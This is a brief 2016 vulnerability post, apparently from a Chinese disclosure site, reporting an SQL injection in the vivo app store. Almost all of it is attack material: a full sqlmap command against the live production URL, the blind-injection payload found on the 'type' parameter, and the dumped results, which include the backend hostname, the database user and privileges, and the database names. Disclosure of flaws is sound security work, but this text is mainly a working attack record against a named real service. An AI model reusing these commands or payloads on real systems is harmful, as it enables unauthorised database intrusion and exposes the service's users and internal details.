vivo应用商店一处SQL注入

Datetime:2016-08-23 00:17:03          Topic: SQL Injection  SQL           Share
python sqlmap.py -u "http://main.appstore.vivo.com.cn/rec/newapps?nt=WIFI&u=-57806365&;model=vivo+Y13iL&density=1.5&pictype=webp&elapsedtime=13993004&screensize=480_854&an=4.4.4&imei=868102024538774&app_version=622&type=2&av=19&cs=0&s=2%7C3511262971"
Parameter: type (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: nt=WIFI&u=-57806365&model=vivo Y13iL&density=1.5&pictype=webp&elapsedtime=13993004&screensize=480_854&an=4.4.4&imei=868102024538774&app_version=622&type=(SELECT (CASE WHEN (9154=9154) THEN 9154 ELSE 9154*(SELECT 9154 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&av=19&cs=0&s=2|3511262971
---
back-end DBMS: MySQL 5.0
banner: '5.5.39-log'
current user: '[email protected]

%'

current database: 'appstore'

hostname: 'bj_appdb02'

current user is DBA: False

database management system users [1]:

[*] 'myappstore_r'@'10.13.13.%'

database management system users privileges:

[*] %myappstore_r% [1]:

privilege: USAGE

database management system users roles:

[*] %myappstore_r% [1]:

role: USAGE

available databases [3]:

[*] appstore

[*] information_schema

[*] test





About List